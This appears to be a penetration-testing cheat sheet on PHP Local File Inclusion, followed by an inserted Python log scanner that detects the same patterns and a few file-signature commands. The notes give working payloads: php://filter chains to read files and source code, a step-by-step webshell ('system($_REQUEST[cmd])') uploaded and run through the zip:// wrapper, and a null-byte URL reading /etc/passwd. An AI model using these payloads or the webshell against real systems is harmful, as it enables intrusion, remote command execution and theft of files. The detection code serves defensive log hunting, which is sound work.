LFI

Local File Inclusion

PHP Filters & Wrappers

Filter Inclusion

Exfiltrate files
php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>
Exfiltrate the source code
php://filter/convert.base64-encode/resource=dashboard

Remote Code Execution

The zip:// stream wrapper can be used in specific attack scenarios to potentially execute malicious code.

  • First, create the webshell:

echo '<?php system($_REQUEST["cmd"]); ?>' > cmd.php
  • Second, zip the file:

zip shell.zip cmd.php
  • Note that the file extension does not have to be .zip; the wrapper will still open the archive and include the code inside.

  • Third, upload the file and, once that is done, use the wrapper:

zip://uploads/PATH/TO/FILE%23cmd&cmd=id
  • Keep in mind that %23 is the URL-encoded form of # and is used to reference a file inside the archive.

The %00 Null Terminator

The null byte (%00) is often used to terminate a string prematurely, allowing an attacker to discard whatever the application appends to the filename (such as a forced extension). PHP 5.3.4 and later reject paths containing a null byte, so this only works against older versions.

http://10.10.10.80/index.php?op=/etc/passwd%00
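Added detection example (not part of these notes): a Python scanner that pulls the query parameters out of constructed access-log lines, strips repeated URL-encoding, and tags the wrapper, filter, zip-fragment and null-byte patterns listed above so the same tricks can be hunted for in web server logs. The log lines, client IPs and parameter names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not taken from the original page)
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=dashboard HTTP/1.1" 200 4096
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=zip://uploads/avatar.jpg%23cmd&cmd=id HTTP/1.1" 200 128
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?op=/etc/passwd%00 HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=%2570hp://filter/resource=config HTTP/1.1" 200 64
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
WRAPPER_RE = re.compile(r'^(php|zip|phar|data|expect|glob|compress\.\w+)://', re.I)

def fully_decode(value):
    # Peel off repeated URL-encoding so %2570hp:// is recognised as php://
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def classify(value):
    """Return finding tags for one decoded parameter value (empty if benign)."""
    findings = []
    m = WRAPPER_RE.match(value)
    if m:
        scheme = m.group(1).lower()
        findings.append("wrapper:" + scheme)
        if scheme == "zip" and "#" in value:  # zip://archive#member form
            findings.append("zip-fragment")
        if "convert.base64-encode" in value:  # source-disclosure filter chain
            findings.append("filter-base64")
    if "\x00" in value:  # %00 truncation attempt
        findings.append("null-byte")
    if "../" in value or value.startswith("/"):  # leaves the intended directory
        findings.append("path-escape")
    return findings

def scan_log(text):
    # Returns (client_ip, parameter_name, findings) for every suspicious parameter
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            findings = classify(fully_decode(raw))
            if findings:
                hits.append((line.split(" ", 1)[0], name, findings))
    return hits
```

The last sample line shows why decoding is repeated: a single decode would leave `%70hp://` and miss the wrapper.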
Chaining

File Signatures

Identifies the file type, then reads its first 16 bytes and displays them in hexadecimal with an ASCII representation:
file myfile && head -c 16 myfile | xxd
Converts the entire file into plain hex and extracts the first line:
xxd -p filename | head -n 1